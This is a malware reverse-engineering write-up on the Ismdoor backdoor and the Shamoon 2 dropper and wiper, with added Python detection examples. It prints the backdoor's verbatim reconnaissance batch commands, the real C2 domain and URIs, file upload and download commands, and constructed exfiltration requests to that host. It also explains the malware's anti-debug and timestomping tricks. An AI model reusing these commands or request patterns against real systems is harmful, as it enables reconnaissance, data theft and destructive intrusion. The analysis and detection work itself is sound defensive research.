Dissecting Greenburg Campaign Ismdoor and Shamoon / Disttrack.B


So recently I got my hands on the Ismdoor backdoor from the Greenburg campaign, which is linked to the spread of Shamoon 2 / Disttrack.B, mainly at numerous entities in the Gulf region. Machines infected with Shamoon 2 also had traces and indicators of the Ismdoor backdoor on them. It is theorized that Ismdoor was responsible for getting a foothold in the network, moving laterally and harvesting credentials, which were later used by Shamoon 2 to spread in the network and create havoc.



This blog post is interesting, as here I have analysed Ismdoor, the Shamoon dropper, the communication module and the wiper module.

It took me some time to evade the anti-analysis techniques deployed by the malware author. However, this was not because the techniques were very advanced but mainly because I was not looking in the right place ;) . Also, the absence of packing or obfuscation was a favourable scenario.

The Ismdoor sample I got hold of had a compilation date of 26 July 2016.
MD5: bf4b07c7b4a4504c4192bd68476d63b5


Some indicators


We can see the addresses of APIs being XORed and stored


And then the XOR key (5E644B57h) itself being stored for later use, to recover the API addresses when they are needed







Some file names can be seen in the resource section: Tmp765643.txt, Tmp9932u1.bat and tmp43hh11.txt. A reference to strings like "tasklist" and "findstr -i" indicates that the sample will look for a certain task among the running processes:


Now this is crazy. Why would the author leave all of these strings in clear text and unobfuscated? This clearly shows the purpose of the code: to gather a lot of information about the running system:


Following is what I found.

All of this info is pushed to Tmp765643.txt:
- the domain and username
- ipconfig /all for the network configuration
- net view to give info on other machines in the network
- net user administrator /domain to query the domain administrator account
- netstat -ant to get info on connections
- systeminfo to get info on what is installed on the machine: patches, network card info, BIOS info, timezone etc.
- tasklist to see what is running
- sc query to get the list of all services
- WMIC queries against the SecurityCenter and SecurityCenter2 namespaces to list the Antivirus, Firewall and Antispyware products installed on the machine

-------------------------------------------------------------------------------------------------------------------------

Strings from the HTTP client code, one per line:

WinHttpClient
GET
POST
Cookie: 
charset={[A-Za-z0-9\-_]+}
Content-Length: {[0-9]+}
Location: {[0-9]+}
Set-Cookie:\b*{.+?}\n
;
utf-8
{<html>}
{</html>}
\Microsoft\Windows\Tmp98871
\Microsoft\Windows\TmpFiles.txt
http://
//:localhost
C:\ddd\wer2.txt
Home/CC
Content-Length:
Content-Type: application/x-www-form-urlencoded
Ok
txt
cmd /a /c echo ========================== (User Name) ========================== > "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo %userdomain%\%username% >>"%localappdata%\Microsoft\Windows\jTmp765643.txt" 2>&1
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"


cmd /a /c echo ========================== (IP Config) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c ipconfig /all >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== (Net View) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c net view >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"


cmd /a /c echo ========================== (Net User) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c net user administrator /domain >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== (NetStat) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c netstat -ant >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"


cmd /a /c echo ========================== (SystemInfo) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c systeminfo >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== ( TaskList) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c tasklist >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== ( ServiceList) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c sc query >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"

cmd /a /c echo ========================== (SecurityInformation) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cls
cmd /u /c type "%localappdata%\Microsoft\Windows\jTmp765643.txt" > "%localappdata%\Microsoft\Windows\Tmp765643.txt"
del "%localappdata%\Microsoft\Windows\jTmp765643.txt"

del "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter  Path AntiVirusProduct     Get        /Format:List >> "%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo ---------------------------------------------------------------------------                                                         >>      "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct    Get        /Format:List >> "%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo ---------------------------------------------------------------------------                                                         >>      "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter  Path FirewallProduct        Get        /Format:List >> "%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo ---------------------------------------------------------------------------                                                         >>      "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct       Get     /Format:List >>    "%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo ---------------------------------------------------------------------------                                                         >>      "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter  Path AntiSpywareProduct  Get   /Format:List >> "%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo ---------------------------------------------------------------------------                                                         >>      "%localappdata%\Microsoft\Windows\Tmp765643.txt"

cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiSpywareProduct  Get  /Format:List >> "%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo ---------------------------------------------------------------------------                                                         >>      "%localappdata%\Microsoft\Windows\Tmp765643.txt"
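The recon script above is noisy on the host: every step is a separate cmd.exe child with output redirected into %localappdata%\Microsoft\Windows\jTmp765643.txt, followed by WMIC SecurityCenter queries. The following is an added hunting example, not code from the original post or from the malware: it matches Sysmon-style process-creation command lines against the command-line shapes seen in the script (the file and task names are the ones on this page; the sample events are constructed, and the tasklist | findstr line is reconstructed from the string fragments rather than copied from a capture).

```python
"""Hunt for the Ismdoor recon chain in process-creation command lines.

Added example, not part of the original post. The file names (jTmp765643.txt,
tmp43hh11.txt, Tmp9932u1.bat, Tmp98871, TmpFiles) and the UtilityCheckUpdate
task name are the strings found in the sample; the events below are constructed.
"""
import re
from typing import List, Tuple

# (rule name, regex over the raw CommandLine field)
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # cmd /a /c <recon command> >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
    ("ismdoor_recon_redirect",
     re.compile(r'cmd(\.exe)?\s+/[au]\s+/c\s+.*>>?\s*"?%localappdata%\\Microsoft\\Windows\\j?Tmp765643\.txt', re.I)),
    # WMIC AV / firewall / antispyware enumeration via SecurityCenter(2)
    ("ismdoor_wmic_securitycenter",
     re.compile(r'WMIC\s+/Node:localhost\s+/Namespace:\\\\root\\SecurityCenter2?\s+Path\s+'
                r'(AntiVirusProduct|FirewallProduct|AntiSpywareProduct)', re.I)),
    # (tasklist | findstr -i "<name>" > "...\tmp43hh11.txt" & exit)
    ("ismdoor_tasklist_findstr",
     re.compile(r'tasklist\s*\|\s*findstr\s+-i\s+.*tmp43hh11\.txt', re.I)),
    # cleanup of the persistence task
    ("ismdoor_schtasks_cleanup",
     re.compile(r'schtasks\s+/Delete\s+/TN\s+UtilityCheckUpdate\s+/F', re.I)),
    # the other hard-coded temp artifacts under %localappdata%\Microsoft\Windows
    ("ismdoor_temp_paths",
     re.compile(r'\\Microsoft\\Windows\\(Tmp9932u1\.bat|tmp43hh11\.txt|Tmp98871|TmpFiles)', re.I)),
]


def match_command_line(cmdline: str) -> List[str]:
    """Names of every rule that fires on a single command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def score_host(cmdlines: List[str]) -> Tuple[int, List[str]]:
    """Distinct rules hit across one host's events.

    A single 'tasklist' is normal admin activity; three or more distinct
    rules from the same host in a short window is the recon chain.
    """
    hits = set()
    for line in cmdlines:
        hits.update(match_command_line(line))
    return len(hits), sorted(hits)


# Constructed events: lines 0-4 mimic the script above, 5-6 are benign admin use.
SAMPLE_EVENTS = [
    r'cmd /a /c echo ========================== (User Name) ========================== > "%localappdata%\Microsoft\Windows\jTmp765643.txt"',
    r'cmd /a /c netstat -ant >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"',
    r'cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get /Format:List >> "%localappdata%\Microsoft\Windows\Tmp765643.txt"',
    r'cmd /c (tasklist | findstr -i "Ism.exe" > "%localappdata%\Microsoft\Windows\tmp43hh11.txt" & exit)',
    r'schtasks /Delete /TN UtilityCheckUpdate /F',
    r'C:\Windows\system32\tasklist.exe /svc',
    r'ipconfig /all',
]

if __name__ == "__main__":
    count, names = score_host(SAMPLE_EVENTS)
    print(f"{count} distinct Ismdoor rules hit: {names}")
```

The redirect rule is the most durable one: the individual commands (ipconfig, net view, systeminfo) are all legitimate, but nothing legitimate appends them to a file with that name under %localappdata%\Microsoft\Windows.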


-------------------------------------------------Some other interesting Strings----------------------------------
A lot of inferences can be made just by looking at these strings, and there is a possibility to see some Command and Control related material, like commands issued by the C2 server to be executed by the bot. The relevant strings, one per line:

rem %localappdata%\Microsoft\Windows\Tmp765643.txt#1;
\Microsoft\Windows\Tmp9932u1.bat
\Microsoft\Windows\tmp43hh11.txt" & exit)
" > "
(tasklist | findstr -i "
"del "
|||
2222222222222222222222222222222222222222222222222222222222222222
------Boundary%08X
Content-Disposition: form-data; name="uploaded"; filename="%08x.dat"
Content-Type: application/octet-stream
------Boundary%08X--
Content-Type: multipart/form-data; boundary=----Boundary%08X
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: close
Content-Length: %d
Home/SCV
/Home/SF?commandId=
CmdResult=-2&message=
appId=
Home/BM
WinHTTP Example/1.0
text/txt
/Home/GF?commandId=
Error %u in WinHttpQueryDataAvailable.
Out of memory
Error %u in WinHttpReadData.
DownloadFile
|||Command executed successfully
Error %d has occurred.
AppId
General
DownloadFile
UploadFile
%appdata%
/Home/SF?commandId=
|||Command executed successfully
schtasks /Delete /TN UtilityCheckUpdate /F
\Windows Update.lnk
del 
\Microsoft\Windows\TmpFiles")
\Microsoft\Windows\Tmp*" & rmdir "
\temp\KB*" & del "
" & del "
\temp\" /f & del c:\windows\temp\KB* & del "
(taskkill /im "
Home/AV
cd=
Home/CR
ChangeAliveSeconds:::Done
ChangeAddress
SI
\Microsoft\Windows\Tmp9932u1.bat")
("
GetSendAliveSeconds
SendAliveSeconds:::
restart
remove
-2.txt
\Microsoft\Windows\Tmpedi98871
\Microsoft\Windows\Tmpedo98871
Executed Successfully
invalid vector<T> subscript
vector<T> too long
%lu%u%d%I64d
invalid stoi argument
stoi argument out of range
system
Ism.exe
>>> 2>&1" 2>&1 > "
 /c 
\cmd.exe
Invalid character
 .\*\" /f & "
list<T> too long
Access violation - no RTTI data!
Bad dynamic_cast!
RSDS

The RSDS CodeView record at the end carries the PDB path of the build:

F:\Projects\Bot\Bot\Release\Ism.pdb


--------------------------------------------------------------------------------------------------------------------------

Next we see some strings where the backdoor looks for a process called "Ism.exe" and sends the output to tmp43hh11.txt


Ref: https://blog.vectranetworks.com/blog/an-analysis-of-the-shamoon-2-malware-attack

The process is created and the data is placed in the temp file


Since the Ism.exe process is not found to be running, the empty temp file is deleted:


Ok, I believe the file Tmp98871 which is written to the disk contains the Bot/Client ID, which somehow is created using a binary pattern in the .rdata section (discovered this after quite some trouble, going backwards using hardware breakpoints etc.). This is sent across to the C2 server to identify the bot with the backdoor on it.


The file being written to the disk with 65 bytes of Bot ID:


Now it is time to communicate with the C2 server and send the info out. We can see the user agent which is created. Simply: "WinHttpClient"


We can see the URL to which our request will be POSTed:
http://update(dot)winappupdater(dot)com/Home/CC:


We can see the connection on port 80 (50h)


We can see some request headers being added, like "Content-Length" and "Content-Type":

 Sending the HTTP POST:

In case of failure it checks for the IE proxy config:

Opens the temp file with the Bot ID to send the data out:


The malware also creates this folder: c:\users\<username>\appdata\local\microsoft\windows\tmpfiles. This could be to store the output of the commands which are executed by the malware.


Anyhow, the communication fails as the domain no longer resolves.

I redirected the DNS to a fake DNS server and tried communicating with a fake C2 web server, to see the request, which can be useful in creating IOCs and Snort rules:



Now, since I saw a good number of embedded strings in the code itself, I thought of doing a quick, good old string analysis instead of trying to feed commands to it from the fake C2 server.

Here I can see that the C2 server would instruct the bot to download a file, which could be an info stealer, mimikatz or some other hacktool to be downloaded to the machine:


Some more references to DownloadFile and also UploadFile (for data exfiltration):


The following string clearly indicates that a scheduled task named "UtilityCheckUpdate" is used and later deleted (schtasks /Delete /TN UtilityCheckUpdate /F). Another good candidate for a hunt.


Next we can see the URIs involved in C2 comms, where the commandId is sent across:


We can also see the appId and message parameters, which could also be part of the URI when constructing C2 command replies


The bot could be replying to the C2 server with the result of executing a command, like below:
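The request the fake C2 server receives is what the network IOCs are built from. As an added example, not code from the original post, the function below matches a raw HTTP request against the indicators found in the strings above: the "WinHttpClient" user agent, the C2 host, the /Home/* URIs, the commandId parameter, and the multipart upload form (boundary ----Boundary%08X, field name "uploaded", filename "%08x.dat"). Both requests below are constructed to look like the bot's traffic, not real captures; which /Home/* URI carries uploads is not shown on the page, so /Home/SF in the second request is an assumption, as is the 65-byte placeholder body.

```python
"""Match a captured HTTP request against the Ismdoor C2 indicators on this page.

Added example, not from the original post. Indicator values come from the
strings above; the BEACON and UPLOAD requests are constructed test data.
"""
import re
from typing import Dict, List, Tuple

C2_HOST = "update.winappupdater.com"
C2_PATHS = {"/Home/CC", "/Home/SCV", "/Home/SF", "/Home/GF",
            "/Home/BM", "/Home/AV", "/Home/CR"}
BOUNDARY_RX = re.compile(r"^----Boundary[0-9A-Fa-f]{8}$")          # ----Boundary%08X
UPLOAD_NAME_RX = re.compile(r'name="uploaded"; filename="[0-9a-f]{8}\.dat"')  # %08x.dat


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def ismdoor_indicators(raw: bytes) -> List[str]:
    """Return the Ismdoor indicators present in one request, in a fixed order."""
    method, target, headers, body = parse_request(raw)
    path = target.split("?", 1)[0]
    hits: List[str] = []
    if headers.get("host", "").lower() == C2_HOST:
        hits.append("host:" + C2_HOST)
    if headers.get("user-agent", "").lower() == "winhttpclient":
        hits.append("ua:WinHttpClient")
    if path in C2_PATHS:
        hits.append("uri:" + path)
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("multipart/form-data"):
        boundary = ctype.split("boundary=", 1)[-1]
        if BOUNDARY_RX.match(boundary) and UPLOAD_NAME_RX.search(body.decode("latin-1")):
            hits.append("upload:multipart-%08X")
    m = re.search(r"[?&]commandId=([^&\s]+)", target)
    if m:
        hits.append("commandId:" + m.group(1))
    return hits


# Constructed: the initial check-in with the bot ID (65 bytes per the post; content assumed).
BEACON = (
    b"POST /Home/CC HTTP/1.1\r\n"
    b"Host: update.winappupdater.com\r\n"
    b"User-Agent: WinHttpClient\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 65\r\n"
    b"Connection: close\r\n\r\n"
    + b"A" * 65
)

# Constructed: an UploadFile result; the URI used for uploads is an assumption.
UPLOAD = (
    b"POST /Home/SF?commandId=17 HTTP/1.1\r\n"
    b"Host: update.winappupdater.com\r\n"
    b"User-Agent: WinHttpClient\r\n"
    b"Content-Type: multipart/form-data; boundary=----Boundary0000002A\r\n"
    b"Connection: close\r\n\r\n"
    b"------Boundary0000002A\r\n"
    b'Content-Disposition: form-data; name="uploaded"; filename="0000002a.dat"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"exfiltrated bytes\r\n"
    b"------Boundary0000002A--\r\n"
)

BENIGN = b"GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("beacon", BEACON), ("upload", UPLOAD), ("benign", BENIGN)):
        print(name, ismdoor_indicators(req))
```

The user agent and the eight-hex-digit boundary are the cheapest signals to turn into an IDS rule; the host name alone is weak because the C2 domain is already dead, so a rule should key on the URI and form shape rather than the domain.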



Using this C2 channel, the Ismdoor backdoor, if undetected, could easily have harvested credentials, moved laterally etc., and relayed the info back.

-----------------------------------------Reversing of Shamoon / Disttrack.B-------------------------------------




I got hold of two Shamoon samples. A quick static analysis helps to identify some large resources, some anti-debugging API names and, more interestingly, API calls for creating and managing services, and usage of the netapi32 library and the relevant APIs for creating automated tasks (ATs) or jobs:






Next, using CFF Explorer I can see the resources PKCS7, PKCS12 and X509, which Shamoon uses to drop its modules: the C2 comm and lateral movement module and the wiper module. The wiper module drops the ELDOS (RawDisk) driver in the system32\drivers directory and uses it to wipe the system.


Some screenshots from PA Unit 42 analysis:



There are some more interesting strings in the dropper indicating that a service called "TrkSvr", with its binpath in the system32 folder, will be created.


Dynamic analysis confirms the drop of netinit.exe and trksvr.exe in the system32 folder. Trksvr.exe is the same file as the dropper, which just relocates itself to the system32 directory. netinit.exe is the C2 comm module.



I can see the service TrkSvr created with the display name "Distributed Link Tracking Server", which is very similar to the display name of the legitimate TrkWks service ("Distributed Link Tracking Client"). This is to make the service look genuine.


We can see the mutex "BaseNamedObjects\DBWinMutex" being created by the trksvr.exe service:


Procmon shows the registry keys which are written:



Who is Jude? We can also see a string where netinit.exe is passed a parameter of 1. This could be used for the scheduled job which will be created:


 A lot of other file names:


We can see the copying of the sample from its original location to the system32 folder:


Next we see the file is opened for RW:


Next we see the malware tampering with the timestamps of the file (timestomping). This is to thwart forensics (timeline investigations).


Next we see the SCManager being opened


Next it tries to open a service with the name TrkSvr. This is to check whether the service already exists:



Once the error is thrown that the service does not exist, the service is created:





We can see the properties of the service TrkSvr


And detailed description:


We also see that the LanmanWorkstation (Workstation) service is opened and queried to see whether it is running. If not, it is started. This is to enable the use of SMB for lateral movement.


In order to quickly reach the anti-debug technique of the Sleep call, I executed the sample and then attached the debugger to the trksvr service which is created, which landed me at the sneaky little Sleep call, which I bypassed


Can also see some interesting JMPs


Bypassing the Sleep, I landed at a thread creation, which takes me to another anti-debug mechanism using "GetTickCount"; it compares the current tick count to a value of 0C880h


Comparing the tick count result with the stored value of C880h:


If I do not bypass this, it takes me back to the sneaky Sleep call; basically the combination of the GetTickCount and Sleep calls puts the code in an infinite loop.


However, bypassing it leads me to a code branch where many files in the system32 directory are attempted to be deleted:


Following are the string references of those files:




The dropper TrkSvr tries to read something from this file, but the file is non-existent, which was the reason why the execution kept failing. So I had to bypass this as well. Anyhow, with some research I found out that this file, "c:\windows\inf\netft429.pnf", contains the timestamp against which Shamoon compares the current date/time to decide when to execute its code:


The malware TrkSvr, aka the dropper, aka Shamoon, then disables Wow64 file system redirection, so that the files written to the system32 folder on a 64-bit machine actually land in c:\windows\system32 and not in the WOW64 folder.



The dropper then tries to get a handle to read itself:


I come across yet another anti-debug mechanism, which I bypass:


And yet another anti-analysis mechanism (looking at the running processes to find suspected on-going analysis)

After some struggle with the anti-analysis techniques, I finally reached the point where the PKCS7 resource is accessed to drop one of the modules of Shamoon, netinit.exe:


------------------------------PKCS7 - The no good Comm module-------------------------------------------


 We can see the resource being located and loaded:



Creating netinit.exe in system32 folder from the PKCS7 resource:


Writing the file headers on the disk first:


This is where PKCS7 is decrypted from the raw resource bytes into the text section of netinit.exe and written to netinit.exe one byte at a time!


One byte at a time. No use of buffers.


But still it is only partially written. Next we see VirtualAlloc called, most probably to write the payload of netinit.exe in memory and run it from there while also writing it to the disk.


The memory is written with payload:


Writing the file to disk from memory:


The code then opens the file "netinit.exe" for read/write and changes the file times (timestomping) to thwart forensics.

Another VirtualAlloc call to allocate space in memory to store the parameter of an AT (automated task or job):


We can see that netinit.exe will be executed with parameter 1 by the scheduled job:


Trying to retrieve the date/time from a remote server, but it does not succeed


Then we see a strange method for memory allocation from the heap, using the NetApiBufferAllocate API call:

Seems like a scheduled job is being created for persistence of the netinit.exe module:



Now let us compare the AT_INFO structure pointed to by 00B2DF70h above with the function specs:


The command is pointed to by the following location (the fifth field of AT_INFO, the Command pointer, 01510000h):


If we go to this location we can see the following:


Next we see that the process netinit.exe is called with a parameter of 1


 We can see netinit.exe running under the dropper TrkSvr

Some interesting strings found in netinit.exe: netft429.pnf again.


WININET and WS2_32 indicate network communication:


We can see a local ip 10.1.252.19 and a URI /ajax_modal/modal/data.asp. What could this be for?


The netinit.exe module also tries to open the pnf file for reading but cannot find it:


Next we see a URL being constructed for an HTTP request:


Here we can see the request being sent to a host called "home", with parameters containing the local IP address and a "status" field created from the TickCount + keyboard layout + the content of the non-existent pnf file. This, however, fails. No idea what the purpose of this component is, as it fails and never really communicates with any C2. A half-baked attempt, maybe.



Many blogs, including Kaspersky's and PA's, have indicated that this module does not work correctly or as intended because of poor coding by the authors.

So I decided to move on to the dropper execution, TrkSvr.exe, and see what else it has in store.

------------------------------------------ PKCS12 - The Wiper---------------------------------------------------

Going back to the dropper execution, I can see a file named out17626867.txt being accessed, with failure as it does not exist. We also see a string "myimage12767" (could this be the image with which the wiper overwrites the bytes on disk?).



The dropper checks whether a file with the name "netx.exe" exists in the system32 folder. If not, it accesses the PKCS12 resource and loads it:


From the resource editor:

Dumped in memory:


This PKCS12 resource is decrypted and written as netx.exe in the system32 folder, exactly as the PKCS7 resource was decrypted and written as netinit.exe:



Just like PKCS7, which was decrypted into memory and then written to the file on disk, PKCS12 undergoes the same process:

Written to netx.exe in system32 folder:



Let us quickly have a look at the strings in the newly dropped binary aka the wiper:

From analysis of the strings we can guess a couple of functionalities of PKCS12 (netx.exe). It looks for information on directories and subfolders under the "Users" folder and the "Documents and Settings" (XP) folder, like "download", "document", "picture", "video", "music", "desktop". The code redirects the error stream to nul (so nothing is output in case of an error). In case of no error, the info is written to the file f1.inf on non-XP machines and to f2.inf on XP machines.

We also see a malicious service "drdisk" being created, through which the kernel driver "drdisk.sys" is loaded and executed.

The most interesting string is the pdb path "c:\shamoon\arabiangulf\wiper\release.pdb", from which the name "Shamoon" originated. While the significance of the word "Shamoon" is not known, it is speculated that it is the name of one of the malware authors. Shamoon is the Arabic equivalent of Simon. Ref: https://www.tofinosecurity.com/blog/shamoon-malware-and-scada-security-%E2%80%93-what-are-impacts




Some more interesting strings:

Registry key strings used to look for the list of partitions on the disk:


Next we see the file netx.exe is accessed for RW, and that is to mess with its timestamps as well:



Timestomped from:
To:


Again VirtualAlloc is called to store the "command" parameter for the AT (scheduled job) to be created for persistence of the wiper module:


No parameters passed to the wiper module:

Adding a scheduled job:


Let us look at what is being scheduled by looking at the AT_INFO structure which is passed as a parameter to the NetScheduleJobAdd function.

The AT_INFO structure looks like the following:


So D30000h is where the "Command" is


Let us look at what the command is:


Scheduled job created. Now executing the netx.exe process:




As soon as the process executes, it creates the following service, as evident from the strings: the "drdisk" service:

Continuing with the execution of the trksvr.exe service, it then loads an image


The return value is null, so the image is not present as a resource in trksvr.exe


I had to suspend netx.exe because it was slowing down the VM (while it was wiping data on disk) and I wanted to proceed with the reversing.

By the way, the kernel driver (ELDOS) used to access the disk has already been dropped for the wiping ;)


We can see the digital certificate of drdisk.sys in the drivers folder:


That's about it for what the dropper trksvr does.
Let us look at netx.exe. It looks for the drdisk service and deletes it if it exists.
Then it loads the resource "ReadOne" with id "101":


Looking at the resources of netx.exe using CFF explorer:


This resource "ReadOne" is decrypted into the drdisk.sys module and dropped into the drivers folder:


Just like the other 2 components, this one also has its headers written to memory and then written to disk


The code section is decrypted using this decryption routine and written to disk as well (appended to drdisk.sys):
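All three embedded modules (PKCS7 to netinit.exe, PKCS12 to netx.exe, ReadOne to drdisk.sys) go through the same decrypt-and-write routine, but the post does not show the cipher itself. The following is an added example, not the post's or Shamoon's code: it assumes the resource is a repeating-key XOR of a PE file (an assumption, not something the page confirms) and recovers the key from the plaintext every MSVC-linked PE carries, "MZ" at offset 0 and the DOS stub text at offset 0x4E, then verifies the candidate by checking for "PE\0\0" at e_lfanew. The encrypted sample and the 4-byte key are constructed in memory; the key is hypothetical and unrelated to the real samples.

```python
"""Recover a repeating XOR key from an encrypted embedded PE and decrypt it.

Added example, not from the original post. ASSUMES a repeating-key XOR cipher;
the real Shamoon resource encryption is not shown on the page. Known plaintext:
"MZ" at 0 and the standard DOS stub message at 0x4E (MSVC linker layout).
"""
import struct
from typing import Optional

KNOWN_PLAINTEXT = [
    (0x00, b"MZ"),
    (0x4E, b"This program cannot be run in DOS mode."),
]


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """MZ header plus a PE signature where e_lfanew points."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def derive_key(enc: bytes, klen: int) -> Optional[bytes]:
    """Key bytes implied by the known plaintext for one key length, or None on contradiction."""
    key = [None] * klen
    for offset, plain in KNOWN_PLAINTEXT:
        for i, p in enumerate(plain):
            pos = offset + i
            if pos >= len(enc):
                return None
            k = enc[pos] ^ p
            if key[pos % klen] is None:
                key[pos % klen] = k
            elif key[pos % klen] != k:
                return None              # same key slot, two different values
    return None if None in key else bytes(key)


def recover_xor_key(enc: bytes, max_len: int = 32) -> Optional[bytes]:
    """Shortest key length whose derived key yields a valid PE signature."""
    for klen in range(1, max_len + 1):
        key = derive_key(enc, klen)
        if key is not None and looks_like_pe(xor_bytes(enc, key)):
            return key
    return None


def decrypt_resource(enc: bytes) -> Optional[bytes]:
    key = recover_xor_key(enc)
    return None if key is None else xor_bytes(enc, key)


def build_fake_pe() -> bytes:
    """Constructed test data: a minimal MZ/PE skeleton with the standard DOS stub."""
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)          # e_lfanew
    stub = b"This program cannot be run in DOS mode."
    dos[0x4E:0x4E + len(stub)] = stub
    return bytes(dos) + b"PE\0\0" + b"\x4c\x01" + b"\x00" * 250   # Machine = i386, padding


ASSUMED_KEY = bytes.fromhex("4a1ec37f")                 # hypothetical key, not Shamoon's
ENCRYPTED_RESOURCE = xor_bytes(build_fake_pe(), ASSUMED_KEY)

if __name__ == "__main__":
    print("recovered key:", recover_xor_key(ENCRYPTED_RESOURCE).hex())
```

If the derived key decrypts "MZ" and the stub but the PE signature check fails, the cipher is not a plain repeating XOR (a rolling or position-dependent key, for instance) and the routine the post shows at the write loop has to be lifted from the dropper instead.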

The service will now be created and started:


This is where the service drdisk is started.


Meanwhile, continuing with analysing netx.exe, why does it try to open this config (pnf) file for reading again?

Aaaaa..ok, to check whether it exists or not, and if not then it writes it to the disk


Let us see what this file is. Strangely, the file is created with a single null character written to it!


Next we see the malware run multiple times to check for directories and sub-directories and get that info written to the f1.inf and f2.inf files:


We can see findstr.exe running under netx.exe to locate the directories


The files f1.inf and f2.inf are written in the system32 folder


